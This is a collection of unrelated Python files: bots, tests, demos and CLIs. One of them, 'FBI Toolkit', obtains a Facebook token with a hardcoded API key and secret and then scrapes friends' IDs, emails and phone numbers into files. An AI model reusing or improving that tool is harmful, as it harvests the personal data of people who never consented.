headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'}
output_path = # path to your output folder
# parameters for failure retry
sleep_time = 60
num_retries = 5
|
# -*- coding: utf-8 -*-
# flake8: noqa
from __future__ import absolute_import, print_function, unicode_literals
from .shell import Shell
|
import sys
import commander
import shlex
import utils
from logger import L
from gv import num_version, load_config_project
from time import sleep
def main(arguments):
# My code here
if len(arguments) > 1:
commander.main(args)
else:
utils.register_exit()
loop()
pass
def loop():
"""
1. read input
2. pasrse command
3. continue
:return:
"""
load_config_project()
L.debug("running with version: %s", sys.version)
is_version_2 = sys.version.startswith("2")
while True:
response = ''
if num_version == 2:
response = raw_input("Enter command:")
if num_version == 3:
response = input("Enter command:")
if response != '':
commander.parse(response)
sleep(0.5)
def get_agrs(str_line):
args = shlex.split(str_line)
return args
if __name__ == "__main__":
args = utils.get_args(sys.argv)
main(args)
|
from subprocess import check_output
from mylcd import mylcd
from time import sleep
def get_hostname():
return check_output('hostname').decode().strip('\n')
def get_ips():
ip_data = check_output('ifconfig').decode().split()
ip_list = []
for item in ip_data:
if "addr:" in item:
ip_list.append(item[5:])
return [i for i in ip_list if i]
if __name__ == '__main__':
myLCD = mylcd()
myLCD.LCD_boot_setup()
myLCD.clear_line_1()
while(True):
myLCD.clear_line_1()
myLCD.print_line_1(get_hostname())
ip_list = get_ips()
for i in ip_list :
myLCD.clear_line_2()
myLCD.print_line_2(i)
sleep(1)
|
from fps import floating_point_system, graficar
def parametros(beta, t, L, U):
numbers, N, UFL, OFL = floating_point_system(beta, t, L, U)
print("La cantidad de numeros flotantes del sistema es: {0}. El numero mas pequeño que se puede representar(UFL) es: {1} y el numero mas grande que se puede representar(OFL) es: {2}".format(N,UFL,OFL))
graficar(numbers, N)
def main():
parametros(2,3,-3,3)
parametros(2,6,-3,3)
main()
|
import pytest
from pystratis.nodes import BaseNode
from pystratis.api import APIError
from pystratis.api.rpc.responsemodels import *
@pytest.mark.integration_test
@pytest.mark.strax_integration_test
def test_call_by_name(strax_hot_node: BaseNode):
try:
response = strax_hot_node.rpc.call_by_name(command='getblockcount')
assert isinstance(response, RPCCommandResponseModel)
except APIError:
# RPC functionality is deprecated and works inconsistently.
pass
@pytest.mark.integration_test
@pytest.mark.strax_integration_test
def test_list_methods(strax_hot_node: BaseNode):
response = strax_hot_node.rpc.list_methods()
assert isinstance(response, list)
for item in response:
assert isinstance(item, RPCCommandListModel)
|
from django.db import models
from django.contrib.auth.models import User
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from Users.models import UserInfo
from mptt.models import MPTTModel, TreeForeignKey
# Create your models here.
class CommentManager(models.Manager):
def all(self):
return super().filter(parent=None)
def filter_by_instance(self, instance):
content_type = ContentType.objects.get_for_model(instance.__class__)
obj_id = instance.id
qs = super().filter(content_type=content_type,
object_id=obj_id).filter(parent=None)
return qs
class Comment(MPTTModel):
user = models.ForeignKey(User, on_delete=models.CASCADE)
content = models.TextField()
create_date = models.DateField(auto_now=True)
# parent = models.ForeignKey("self", blank=True, null=True)
parent = TreeForeignKey('self', null=True, blank=True,
related_name='children', db_index=True,
on_delete=models.CASCADE)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
# objects = CommentManager()
class Meta:
db_table = 'Comment'
def __str__(self):
return self.content
def children_comment(self):
return Comment.objects.filter(parent=self)
def get_user_info(self):
return UserInfo.objects.filter(user=self.user)
|
# this class is responsible for formatting the data requested as a string that can be used as a response by the chat bot
# each function here takes in the returned data of its corresponding data request function, as well as the full list of entities
# it returns a string that the bot should respond with
class ResponseFormat(object):
def getDistanceFormat(distance, entities):
entities = entities['wit$location:location']
place1 = entities[0]['value']
if len(entities) == 1:
return "The distance to " + place1 + " is " + str(round(distance, 2)) + "km.\n"
else:
place2 = entities[1]['value']
return "The distance between " + place1 + " and " + place2 + " is " + str(round(distance, 2)) + "km.\n"
def getTimezoneFormat(timezone, entities):
entities = entities['wit$location:location']
place = entities[0]['value']
return "The time zone at " + place + " is " + str(timezone[0]) + ".\n"
def getLocalTimeFormat(time, entities):
entities = entities['wit$location:location']
response = ""
i = 0
for location in entities:
response += "The time in " + location['value'] + " is " + str(time[i]) + ".\n"
i = i + 1
return response
def getTimeDifferenceFormat(time, entities):
entities = entities['wit$location:location']
if len(entities) == 1:
return "The difference in time from here to " + entities[0]['value'] + " is " + str(time) + ".\n"
else:
return "The difference in time between " + entities[0]['value'] + " and " + entities[1]['value'] + " is " + str(time) + ".\n"
def getTemperatureFormat(temps, entities):
entities = entities['wit$location:location']
response = ""
i = 0
for location in entities:
response += "The temperature in " + location['value'] + " is " + str(temps[i]['temp']) + " degrees celcius.\n"
i = i + 1
return response
def getWeatherFormat(weather, entities):
entities = entities['wit$location:location']
return "The weather in " + entities[0]['value'] + " is " + str(weather) + ".\n"
def getPointOfInterestFormat(POI, entities):
entities = entities['wit$location:location']
response = "The POIs in " + entities[0]['value'] + " are "
for poi in POI:
stringsplitpoint = poi.find(', ') + 2
response += poi[stringsplitpoint:poi.find(',', stringsplitpoint+1)] + ", "
response = response[:-2]
response += ".\n"
return response
|
from flask import Flask
from flask import render_template
import fbchat
import base64
client = fbchat.Client("marikalee15@gmail.com",)
app = Flask(__name__)
@app.route("/")
def main():
return render_template('main.html')
@app.route("/button")
def messageMarika():
friends = client.getUsers("Marika Lee")
friends = client.getUsers("Marika Lee") # return a list of names
friend = friends[0]
sent = client.send(friend.uid, "hello :)")
if sent:
print("Message sent successfully!")
return 'Message sent to Marika.'
if __name__ == "__main__":
app.run()
|
# -*- coding: utf-8 -*-
import os
import requests
import telebot
from flask import Flask, request
from data import TOKEN, bot, HEROKU_APP_NAME, format_kind
from markups import main_markup, back_markup, map_type_markup, geo_type_markup, toponym_markup, results_markup, \
request_markup
from mapAPI import map_api
from getWeather import get_weather
server = Flask(__name__)
PORT = int(os.environ.get('PORT', 5000))
@bot.message_handler(commands=["start"])
def start(message):
bot.send_message(message.chat.id, 'Я бот, работающий с картами и другими инструментами. '
'Получите полное описание по команде "❓ Помощь"',
reply_markup=main_markup)
@bot.message_handler(commands=["help"])
def help(message):
bot.send_message(message.chat.id, '''
Команды:
🧭 *Карта*
*Обязательные параметры:*
geocode/геокод: адрес или координаты объекта
kind/топоним: топонима
place/место: название организации
results/результаты: количество результатов
*Дополнительные параметры:*
l/layer/слой: перечень слоев (спутник, схема, гибрид, траффик)
z/zoom/масштаб: уровень масштабирования (0-17)
s/scale/увеличение: коэффициент увеличения объектов (1.0-4.0)
⛅ *Погода*
Вызовите команду, а затем введите название города
⬅ *Назад*
Возвращает назад
''', parse_mode="Markdown")
@bot.message_handler(commands=["weather"])
def weather(message):
if message is None:
return
bot.send_message(message.chat.id, 'Чтобы узнать погоду, введите название города', reply_markup=back_markup)
bot.register_next_step_handler(message, get_weather)
@bot.message_handler(commands=['map'])
def map_command(message):
bot.send_message(message.chat.id, "Выберите тип поиска", reply_markup=map_type_markup)
bot.register_next_step_handler(message, map_type)
def map_type(message):
text = message.text.strip().lower()
if text in ["🗻 поиск по объектам", "поиск по объектам", "объекты"]:
bot.send_message(message.chat.id, "Введите адрес или координаты", reply_markup=back_markup)
bot.register_next_step_handler(message, geo)
elif text in ["🏢 поиск по организациям", "поиск по организациям", "организации"]:
bot.send_message(message.chat.id, "Введите название организации", reply_markup=back_markup)
bot.register_next_step_handler(message, place)
elif text in ["⌨ ввести вручную", "ввести вручную", "вручную"]:
pass
elif text in ["⬅ назад", "назад"]:
bot.send_message(message.chat.id, "Вернулись назад в главное меню", reply_markup=main_markup)
else:
bot.send_message(message.chat.id, "Не удалось распознать тип поиска, попробуйте снова",
reply_markup=map_type_markup)
bot.register_next_step_handler(message, map_type)
def geo(message):
REQUEST.pop("geocode", None)
text = message.text.strip().lower()
if text in ["⬅ назад", "назад"]:
bot.send_message(message.chat.id, "Вернулись назад, выберите тип поиска", reply_markup=map_type_markup)
bot.register_next_step_handler(message, map_type)
else:
REQUEST["geocode"] = text
bot.send_message(message.chat.id, "Выберите тип поиска по объектам", reply_markup=geo_type_markup)
bot.register_next_step_handler(message, geo_type)
def geo_type(message):
text = message.text.strip().lower()
if text in ["🗻 поиск объектов", "поиск объектов", "объекты"]:
bot.send_message(message.chat.id, "Задайте количество результатов", reply_markup=results_markup)
bot.register_next_step_handler(message, results)
elif text in ["🎪 поиск ближайших топонимов к объекту", "поиск ближайших топонимов к объекту", "топонимы"]:
bot.send_message(message.chat.id, "Выберите вид топонима", reply_markup=toponym_markup)
bot.register_next_step_handler(message, toponym)
elif text in ["⬅ назад", "назад"]:
bot.send_message(message.chat.id, "Вернулись назад, введите адрес или координаты", reply_markup=back_markup)
bot.register_next_step_handler(message, geo)
else:
bot.send_message(message.chat.id, "Недопустимый тип поиска по объекту, введите снова",
reply_markup=geo_type_markup)
bot.register_next_step_handler(message, geo_type)
def toponym(message):
REQUEST.pop("kind", None)
text = message.text.strip().lower()
if text in ["⬅ назад", "назад"]:
bot.send_message(message.chat.id, "Вернулись назад, выберите тип поиска по объектам",
reply_markup=geo_type_markup)
bot.register_next_step_handler(message, geo_type)
elif text in format_kind:
REQUEST["kind"] = format_kind[text]
bot.send_message(message.chat.id, "Задайте количество результатов", reply_markup=results_markup)
bot.register_next_step_handler(message, results)
else:
bot.send_message(message.chat.id, "Недопустимый вид топонима, введите снова", reply_markup=toponym_markup)
bot.register_next_step_handler(message, toponym)
def place(message):
REQUEST.pop("place", None)
text = message.text.strip().lower()
if text in ["⬅ назад", "назад"]:
bot.send_message(message.chat.id, "Вернулись назад, выберите тип поиска", reply_markup=map_type_markup)
bot.register_next_step_handler(message, map_type)
else:
REQUEST["place"] = text
bot.send_message(message.chat.id, "Задайте количество результатов", reply_markup=results_markup)
bot.register_next_step_handler(message, results)
def results(message):
REQUEST.pop("results", None)
text = message.text.strip().lower()
if text in ["⬅ назад", "назад"]:
bot.send_message(message.chat.id, "Вернулись назад, выберите тип поиска",
reply_markup=map_type_markup)
bot.register_next_step_handler(message, map_type)
elif text.isdigit():
REQUEST["results"] = text
bot.send_message(message.chat.id, 'Задайте вручную параметры, которые были установлены по умолчанию. '
'Для этого введите их в формате <параметр>=<значение>, перечисляя с '
'поомощью ";"',
reply_markup=request_markup)
bot.register_next_step_handler(message, make_request)
else:
bot.send_message(message.chat.id, "Недопустимое количество результатов, введите снова",
reply_markup=results_markup)
bot.register_next_step_handler(message, results)
def make_request(message):
global REQUEST
text = message.text.strip().lower()
if text in ["⬅ назад", "назад"]:
bot.send_message(message.chat.id, "Вернулись назад, задайте количество результатов",
reply_markup=results_markup)
bot.register_next_step_handler(message, results)
return
elif text not in ["➡ пропустить", "пропустить"]:
REQUEST.update({param.split("=")[0]: param.split("=")[1] for param in text.split(';')})
output = map_api.main(";".join([f"{key}={value}" for key, value in REQUEST.items()]))
if isinstance(output, str):
bot.send_message(message.chat.id, output, reply_markup=main_markup)
else:
im = open("map.png", "rb")
description = []
for d in output:
raw = []
for key, value in d.items():
if key != 'spn':
raw.append(f"{key}: {value}")
description.append('\n'.join(raw))
description.insert(0, f'По вашему запросу найдено результатов: {len(description)}:')
description = '\n\n'.join(description)
if len(description) > 963:
description = description[:963] + "...\n...описание слишком длинное, что отобразить его полностью"
bot.send_photo(message.chat.id, im, caption=description, reply_markup=main_markup)
REQUEST = {}
@bot.message_handler(content_types=["text"])
def dialog(message):
text = message.text.strip().lower()
if text in ['⬅ назад', 'назад']:
bot.send_message(message.chat.id, "Нет запущенной комманды на данный момент", reply_markup=main_markup)
elif text in ["🧭 карта", "карта"]:
map_command(message)
elif text in ["⛅ погода", "погода"]:
weather(message)
elif text in ["❓ помощь", "помощь"]:
help(message)
elif text.startswith('/'):
bot.send_message(message.chat.id, f'Нет команды "{text}"', reply_markup=main_markup)
else:
bot.send_message(message.chat.id, "Не удалось обработать запрос", reply_markup=main_markup)
@server.route('/' + TOKEN, methods=['POST'])
def getMessage():
json_string = request.get_data().decode('utf-8')
update = telebot.types.Update.de_json(json_string)
bot.process_new_updates([update])
return "!", 200
@server.route("/")
def webhook():
bot.remove_webhook()
bot.set_webhook(url=f"https://{HEROKU_APP_NAME}.herokuapp.com/{TOKEN}")
return "?", 200
if __name__ == '__main__':
REQUEST = {}
server.run(host="0.0.0.0", port=PORT)
|
# coding: utf-8
#__author__ = cmathx
import numpy
from theano import *
import theano.tensor as T
############function(parameters:dmatrix)################
#function1
x = T.dmatrix('x')
s = 1 / (1 + T.exp(-x))
logistic = function([x], s)
print logistic([[0, 1], [-1, -2]])
#function2
s2 = (1 + T.tanh(x / 2)) / 2
logistic2 = function([x], s2)
print logistic2([[0, 1], [-1, -2]])
#function(more parameters)
a, b = T.dmatrices('a', 'b')
diff = a- b
abs_diff = abs(diff)
diff_squared = diff ** 2
f = function([a, b], [diff, abs_diff, diff_squared])
print f([[1, 1], [1, 1]], [[0, 1], [2, 3]])
############function(parameters:dscalars)################
#function1(default parameters)
x, y = T.dscalars('x', 'y')
z = x + y
f = function([x, Param(y, default = 1)], z)
print f(33)
print f(33, 2)
#function2(default parameters)
x, y, w = T.dscalars('x', 'y', 'w')
z = (x + y) * w
f = function([x, Param(y, default = 1), Param(w, default = 2, name = 'w_by_name')], z)
print f(33)
print f(33, 2)
print f(33, 0, 1)
print f(33, w_by_name = 1)
|
import os
import requests
import json
import sys
import getpass
import hashlib
def baliho():
print '[+]FBI Tookit'
try:
token =open('token.txt','r').read()
r = requests.get('https://graph.facebook.com/me?/acces_token=' + token)
a = json.loads(r.text)
name = a['name']
n.append(a['name'])
print '''
,--.
{ }
K, }
/ `Y`
_ / /
{_'-K.__/
`/-.__L._
/ ' /`\_}
/ ' / -[FBI Toolkit]-
____ / ' /
,-'~~~~ ~~/ ' /_
,' ``~~~%%',
( % Y info
{ %% I -----------------------
{ - % `. Author :WhoMHW
| ', % ) Telegram :@Hedy2
| | ,..__ __. Y Youtube :CatatanNewbie
| .,_./ Y ' / ^Y J )| Team :WongNdesoTeam
\ |' / | | || Instagram:www.instagram.com/siapa_namasaya23/
\ L_/ . _ (_,.'( Tanggal :20210121
\, , ^^""' / | ) Versi :0.02
\_ \ /,L] /
'-_`-, ` ` ./`
`-(_ )
^^\..___,.--`'''
except:
print '''
Informasi FacebooK[FBI]
,--.
{ }
K, }
/ `Y`
_ / /
{_'-K.__/
`/-.__L._
/ ' /`\_}
/ ' / -[FBI Toolkit]-
____ / ' /
,-'~~~~ ~~/ ' /_
,' ``~~~%%',
( % Y info
{ %% I -----------------------
{ - % `. Author :WhoMHW
| ', % ) Telegram :@Hedy2
| | ,..__ __. Y Youtube :CatatanNewbie
| .,_./ Y ' / ^Y J )| Team :WongNdesoTeam
\ |' / | | || Instagram:www.instagram.com/siapa_namasaya23/
\ L_/ . _ (_,.'( Tanggal :20210121
\, , ^^""' / | ) Versi :0.02
\_ \ /,L] /
'-_`-, ` ` ./`
`-(_ )
^^\..___,.--`
--[Telegram:@Hedy2]--
--[Email:mbiasa736@gmail.com]--
'''
reload (sys)
sys.setdefaultencoding ( 'utf8' )
n = []
def main():
print
print '\t\t[--FBI [Facebook Informasi] (Version 0.01)--]'
print '\t\t[--Author : WhoMHw --]'
print '''
Informasi FacebooK[FBI]
,--.
{ }
K, }
/ `Y`
_ / /
{_'-K.__/
`/-.__L._
/ ' /`\_}
/ ' / -[FBI Toolkit]-
____ / ' /
,-'~~~~ ~~/ ' /_
,' ``~~~%%',
( % Y info
{ %% I -----------------------
{ - % `. Author :WhoMHW
| ', % ) Telegram :@Hedy2
| | ,..__ __. Y Youtube :CatatanNewbie
| .,_./ Y ' / ^Y J )| Team :WongNdesoTeam
\ |' / | | || Instagram:www.instagram.com/siapa_namasaya23/
\ L_/ . _ (_,.'( Tanggal :20210121
\, , ^^""' / | ) Versi :0.02
\_ \ /,L] /
'-_`-, ` ` ./`
`-(_ )
^^\..___,.--`
--[Telegram:@Hedy2]--
--[Email:mbiasa736@gmail.com]--
'''
def perintah():
print '''\tPerintah Catatan
___________ _________
buka_nomor Untuk Mengetahui nomor teman
buka_id Untuk Mengetahui id teman
buka_email Untuk Mengetahui email teman
lihat_id Untuk Melihat Id teman kamu
lihat_email Untuk Melihat Email teman kamu
token Untuk Membuat token
cat_token Untuk Mengetahui token anda
nano_token Untuk anda yang sudah mempunyai token
help Untuk Mengetahui keterangan tools
exit Untuk keluar
clear clear terminal
'''
try:
import requests
except ImportError:
print '''
TRacking Informasi FacebooK
,--.
{ }
K, }
/ `Y`
_ / /
{_'-K.__/
`/-.__L._
/ ' /`\_}
/ ' / -[FBI Toolkit]-
____ / ' /
,-'~~~~ ~~/ ' /_
,' ``~~~%%',
( % Y info
{ %% I -----------------------
{ - % `. Author :WhoMHW
| ', % ) Telegram :@Hedy2
| | ,..__ __. Y Youtube :CatatanNewbie
| .,_./ Y ' / ^Y J )| Team :WongNdesoTeam
\ |' / | | || Instagram:www.instagram.com/siapa_namasaya23/
\ L_/ . _ (_,.'( Tanggal :20210121
\, , ^^""' / | ) Versi :0.02
\_ \ /,L] /
'-_`-, ` ` ./`
`-(_ )
^^\..___,.--`
[Kamu belum Install pip2 requests]'''
sys.exit()
def hedy():
cek = raw_input('FBI Toolkit>>')
if cek == 'token':
token()
elif cek == 'nano_token':
nano_token()
elif cek == 'cat_token':
cat_token()
elif cek == 'buka_id':
buka_id()
elif cek == 'help':
help()
elif cek == 'clear':
clear()
elif cek == 'keterangan':
keterangan()
elif cek == 'buka_email':
buka_email()
elif cek == 'buka_nomor':
buka_nomor()
elif cek == 'exit':
exit()
elif cek == 'keluar':
exit()
elif cek == 'lihat_id':
lihat_id()
elif cek == 'lihat_email':
nomor()
elif cek == 'lihat_nomor':
mail()
else:
print '[?]Perintah tidak ditemukan'
print '[?]Jika tidak mengerti hubungi admin'
hedy()
def exit():
print '[*]Terimakasih telah menggunakan.!'
sys.exit()
def clear():
print '[?]Mencoba membersihkan layar'
try:
print '[*]clear terminal'
os.system('clear')
baliho()
hedy()
except:
print '[?]Kamu memakai CMD'
baliho()
hedy()
def help():
print '''
+-------------------------------------------+
|_________________Keterangan________________|
| Tools ini mungkin tidak seratus persen |
| Berhasil |
+-------------------------------------------+
'''
baliho()
hedy()
def keterangan():
print '''
+-------------------------------------------+
|_________________Keterangan________________|
| Tools ini mungkin tidak seratus persen |
| Berhasil |
+-------------------------------------------+'''
baliho()
hedy()
def buka_nomor():
print '[*]Strating Token'
try:
token = open('token.txt','r').read()
print '[+]Mendapatkan token'
except IOError:
print '[-]Gagal mendapatkan token'
print '[-]Jika tidak mengerti hubungi admin'
hedy()
try:
os.mkdir('hasil')
except OSError:
pass
try:
r = requests.get('https://graph.facebook.com/me/friends?access_token='+token)
a = json.loads(r.text)
out = open('_phone.txt','w' )
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+token)
z = json.loads
try:
out.write( z['mobile_phone'])
except KeyError:
pass
out.close()
print '[*]Sukses mengembail nomor teman'
print '[*] Disave : _phone.txt'
baliho()
hedy()
except KeyboardInterrupt:
print '[!] Stopped'
def buka_email():
print '[*]Strating token'
try:
token = open('token.txt','r').read()
print '[*]Mendapatkan token'
except IOError:
print '[-]Gagal mendapatkan Token'
print '[-]Jika tidak mengerti hubungi admin'
hedy()
try:
os.mkdir('hasil')
except OSError:
pass
try:
print '[*]Mencari Email teman'
r = requests.get('https://graph.facebook.com/me/friends?access_token='+token)
a = json.loads(r.text)
out = open('_mail.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+token)
z = json.loads(x.text)
try:
out.write( z['name'] + ':' + z['email'])
except KeyError:
pass
out.close
print '[+]Sukses Mengambil email teman'
print '[*] Disave : _mail.txt'
sys.exit()
except KeyboardInterrupt:
print '\r[!] Stopped'
hedy()
def buka_id():
print '[*]Strating token'
try:
token = open('token.txt','r').read()
print '[+]Mendapatkan token'
except IOError:
print '[-]Gagal mendapatkan token'
print '[-]Jika tidak mengerti hubungi pembuat'
hedy()
try:
os.mkdir('hasil')
except OSError:
pass
try:
r = requests.get('https://graph.facebook.com/me/friends?access_token='+token)
a = json.loads(r.text)
out = open('_id.txt','w')
for i in a['data']:
out.write(i['name'] + ':' + i['id'])
out.close()
print i['name'] + ':' + i['id']
print '\r[*] sukses mengambil id teman'
print '[*] Disave : _id.txt'
sys.exit()
except KeyboardInterrupt:
print '\r[!] Stopped'
hedy()
def cat_token():
try:
wibi = open('token.txt','r').read()
print '[*] Token Kamu !!\n\n' + wibi + '\n'
except:
print '[-]Anda belum login'
print '[?]Hubungi admin jika tidak mengerti'
hedy()
def lihat_id():
try:
id = open('_id.txt','r').read()
print '[+]Mendapatkan ID'
print '[*]ID temanmu.!!\n' + id + '\n'
hedy()
except:
print '[-]ID tidak ditemukan'
print '[-]Jika tidak mengerti hubungi admin'
hedy()
def nomor():
try:
nomor = open('_mail.txt','r').read()
print '[*]Mendapatkan email'
hedy()
except:
print '[-]Email tidak ditemukan'
print '[-]Jika tidak mengerti hubungi admin'
hedy()
def mail():
try:
nomor = open('_phone.txt','r').read()
print '[*]Mendapatkan email'
hedy()
except:
print '[-]Nomor tidak ditemukan'
print '[-]Jika tidak mengerti hubungi admin'
hedy()
def nano_token():
print '[*]Jika tidak mengerti hubungi admin'
try:
print '[*]Masukkan token anda'
token = raw_input('[?]Token:')
teks = open('token.txt', 'w')
teks.write(token)
except:
print '[-}Masukkan token'
hedy()
def token():
print '[*] login aku fb ';id = raw_input('[?] Username : ');pwd = getpass.getpass('[?] Password : ');API_SECRET = '62f8ce9f74b12f84c123cc23437a4a32';data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"};sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.0'+API_SECRET
x = hashlib.new('md5')
x.update(sig)
data.update({'sig':x.hexdigest()})
get(data)
def get(data):
print '[*] Membuat token'
try:
os.mkdir('cookie')
except OSError:
pass
b = open('token.txt','w')
try:
r = requests.get('https://api.facebook.com/restserver.php',params=data)
a = json.loads(r.text)
b.write(a['access_token'])
b.close()
print '[*] success memperoleh token'
print '[*] Tokenmu tersimpan Di token.txt'
exit()
except KeyError:
print '[!] Gagal mengambil token'
print '[!] tolong cek nomor sama password'
os.remove('token.txt')
sys.exit()
main()
perintah()
hedy()
|
#=========================================================================
# pisa_inst_xcel_test.py
#=========================================================================
import pytest
import random
import pisa_encoding
from pymtl import Bits
from PisaSim import PisaSim
from pisa_inst_test_utils import *
#-------------------------------------------------------------------------
# gen_basic_asm_test
#-------------------------------------------------------------------------
def gen_basic_test():
return """
mfc0 r2, mngr2proc < 1
nop
nop
nop
nop
nop
nop
nop
mtx r2, r0
nop
nop
nop
nop
nop
nop
nop
mfx r3, r0
nop
nop
nop
nop
nop
nop
nop
mtc0 r3, proc2mngr > 1
"""
#-------------------------------------------------------------------------
# gen_bypass_mtx_test
#-------------------------------------------------------------------------
def gen_bypass_mtx_test():
return """
mfc0 r2, mngr2proc < 0xdeadbeef
{nops_3}
mtx r2, r0
{nops_7}
mfx r3, r0
{nops_7}
mtc0 r3, proc2mngr > 0xdeadbeef
mfc0 r2, mngr2proc < 0x0a0a0a0a
{nops_2}
mtx r2, r0
{nops_7}
mfx r3, r0
{nops_7}
mtc0 r3, proc2mngr > 0x0a0a0a0a
mfc0 r2, mngr2proc < 0x0b0b0b0b
{nops_1}
mtx r2, r0
{nops_7}
mfx r3, r0
{nops_7}
mtc0 r3, proc2mngr > 0x0b0b0b0b
mfc0 r2, mngr2proc < 0x0c0c0c0c
mtx r2, r0
{nops_7}
mfx r3, r0
{nops_7}
mtc0 r3, proc2mngr > 0x0c0c0c0c
""".format(
nops_7=gen_nops(7),
nops_3=gen_nops(3),
nops_2=gen_nops(2),
nops_1=gen_nops(1)
)
#-------------------------------------------------------------------------
# gen_bypass_mfx_test
#-------------------------------------------------------------------------
def gen_bypass_mfx_test():
return """
mfc0 r2, mngr2proc < 0xdeadbeef
{nops_7}
mtx r2, r0
{nops_7}
mfx r3, r0
{nops_3}
mtc0 r3, proc2mngr > 0xdeadbeef
mfc0 r2, mngr2proc < 0x0a0a0a0a
{nops_7}
mtx r2, r0
{nops_7}
mfx r3, r0
{nops_2}
mtc0 r3, proc2mngr > 0x0a0a0a0a
mfc0 r2, mngr2proc < 0x0b0b0b0b
{nops_7}
mtx r2, r0
{nops_7}
mfx r3, r0
{nops_1}
mtc0 r3, proc2mngr > 0x0b0b0b0b
mfc0 r2, mngr2proc < 0x0c0c0c0c
{nops_7}
mtx r2, r0
{nops_7}
mfx r3, r0
mtc0 r3, proc2mngr > 0x0c0c0c0c
""".format(
nops_7=gen_nops(7),
nops_3=gen_nops(3),
nops_2=gen_nops(2),
nops_1=gen_nops(1)
)
#-------------------------------------------------------------------------
# gen_bypass_test
#-------------------------------------------------------------------------
def gen_bypass_test():
return """
mfc0 r2, mngr2proc < 0xdeadbeef
mtx r2, r0
{nops_3}
mfx r3, r0
mtc0 r3, proc2mngr > 0xdeadbeef
mfc0 r2, mngr2proc < 0x0a0a0a0a
mtx r2, r0
{nops_2}
mfx r3, r0
mtc0 r3, proc2mngr > 0x0a0a0a0a
mfc0 r2, mngr2proc < 0x0b0b0b0b
mtx r2, r0
{nops_1}
mfx r3, r0
mtc0 r3, proc2mngr > 0x0b0b0b0b
mfc0 r2, mngr2proc < 0x0c0c0c0c
mtx r2, r0
mfx r3, r0
mtc0 r3, proc2mngr > 0x0c0c0c0c
""".format(
nops_3=gen_nops(3),
nops_2=gen_nops(2),
nops_1=gen_nops(1)
)
#-------------------------------------------------------------------------
# test_basic
#-------------------------------------------------------------------------
@pytest.mark.parametrize( "name,test", [
asm_test( gen_basic_test ),
asm_test( gen_bypass_mtx_test ),
asm_test( gen_bypass_mfx_test ),
asm_test( gen_bypass_test ),
])
def test( name, test ):
sim = PisaSim( trace_en=True )
sim.load( pisa_encoding.assemble( test() ) )
sim.run()
|
from tkinter import *
def miles_to_km():
km=float(e1_value.get())/1.6
t1.insert(END,km)
window= Tk()
e1_value=StringVar()
e1=Entry(window,textvariable=e1_value)
e1.grid(row=0,column=1)
t1=Text(window,height=1,width=35)
t1.insert(END,"Km Values: ")
t1.grid(row=0,column=2)
b1=Button(window,text="Calculate Km",command=miles_to_km)
b1.grid(row=0,column=0)
window.mainloop()
|
import argparse
import sys
import yaml
from .mlgen_code import code_generate
import os
import pkg_resources
import json
def main():
parser = argparse.ArgumentParser(description="Generate machine learning files in either python or jupyter notebook formats",formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--info',
help='information and additional resources of cli',
)
parser.add_argument('--init','-i', type=str,
help='initialize files',metavar='init')
parser.add_argument('--gen','-g', type=str,
help='generate ML model\'s mlm files')
parser.add_argument('--backend','-be', type=str,
help='backend ML framework used to generate files')
parser.add_argument('--type','-t', type=str, default = 'python',
help='python or jupyter file being generated')
parser.add_argument('--run','-r', type=str,
help='run mlm file to generate python code')
args = parser.parse_args()
sys.stdout.write(str(genfiles(args)))
def createfile(name):
print("creating files")
open(f"{name}.mlm", 'w+').close()
filename = {
'filename': f'{name}.mlm'
}
with open(f'mlm.json', 'w') as json_file:
json.dump(filename, json_file,sort_keys=True, indent=4)
print("file name",filename)
return "creating"
def readfile():
print("reading files")
x = json.load(open("mlm.json",'r'))
print(x['filename'])
return x['filename']
def genfiles(args):
if args.info:
print(
"""
MMMMMMMM MMMMMMMLLLLLLLLLLL GGGGGGGGGGGGG
M:::::::M M:::::::L:::::::::L GGG::::::::::::G
M::::::::M M::::::::L:::::::::L GG:::::::::::::::G
M:::::::::M M:::::::::LL:::::::LL G:::::GGGGGGGG::::G
M::::::::::M M::::::::::M L:::::L G:::::G GGGGGG eeeeeeeeeeee nnnn nnnnnnnn
M:::::::::::M M:::::::::::M L:::::L G:::::G ee::::::::::::ee n:::nn::::::::nn
M:::::::M::::M M::::M:::::::M L:::::L G:::::G e::::::eeeee:::::en::::::::::::::nn
M::::::M M::::M M::::M M::::::M L:::::L G:::::G GGGGGGGGGe::::::e e:::::nn:::::::::::::::n
M::::::M M::::M::::M M::::::M L:::::L G:::::G G::::::::e:::::::eeeee::::::e n:::::nnnn:::::n
M::::::M M:::::::M M::::::M L:::::L G:::::G GGGGG::::e:::::::::::::::::e n::::n n::::n
M::::::M M:::::M M::::::M L:::::L G:::::G G::::e::::::eeeeeeeeeee n::::n n::::n
M::::::M MMMMM M::::::M L:::::L LLLLLG:::::G G::::e:::::::e n::::n n::::n
M::::::M M::::::LL:::::::LLLLLLLLL:::::LG:::::GGGGGGGG::::e::::::::e n::::n n::::n
M::::::M M::::::L::::::::::::::::::::::L GG:::::::::::::::Ge::::::::eeeeeeee n::::n n::::n
M::::::M M::::::L::::::::::::::::::::::L GGG::::::GGG:::G ee:::::::::::::e n::::n n::::n
MMMMMMMM MMMMMMMLLLLLLLLLLLLLLLLLLLLLLLL GGGGGG GGGG eeeeeeeeeeeeee nnnnnn nnnnnn
"""
)
print("Genrate ML files in python and jupyter with this tool\n")
#print("Learn more: https://mlgen.com")
print("Contribute: https://github.com/NebutechOpenSource/MLGen")
#print("Learn more about Nebutech: https://nebutech.in\n")
print(
"""
/$$ /$$ /$$ /$$ /$$ /$$
